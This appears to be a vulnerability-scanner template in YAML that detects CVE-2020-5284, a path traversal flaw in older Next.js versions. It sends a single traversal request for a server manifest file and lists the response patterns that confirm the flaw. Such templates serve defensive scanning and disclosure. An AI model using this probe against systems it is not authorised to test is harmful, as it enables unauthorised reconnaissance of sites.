36 lines
1.3 KiB
YAML
36 lines
1.3 KiB
YAML
id: CVE-2020-5284
|
|
|
|
info:
|
|
name: Next.js .next/ limited path traversal
|
|
author: rootxharsh,iamnoooob,dwisiswant0
|
|
severity: medium
|
|
description: Next.js versions before 9.3.2 have a directory traversal vulnerability. Attackers could craft special requests to access files in the dist directory (.next). This does not affect files outside of the dist directory (.next). In general, the dist directory only holds build assets unless your application intentionally stores other assets under this directory. This issue is fixed in version 9.3.2.
|
|
reference:
|
|
- https://github.com/zeit/next.js/releases/tag/v9.3.2 https://github.com/zeit/next.js/security/advisories/GHSA-fq77-7p7r-83rj
|
|
- https://github.com/zeit/next.js/releases/tag/v9.3.2
|
|
- https://github.com/zeit/next.js/security/advisories/GHSA-fq77-7p7r-83rj
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
|
|
cvss-score: 4.3
|
|
cve-id: CVE-2020-5284
|
|
cwe-id: CWE-22
|
|
tags: cve,cve2020,nextjs,lfi
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/_next/static/../server/pages-manifest.json"
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: regex
|
|
regex:
|
|
- '\{"/_app":".*?_app\.js"'
|
|
part: body
|
|
- type: word
|
|
words:
|
|
- "application/json"
|
|
part: header
|
|
- type: status
|
|
status:
|
|
- 200
|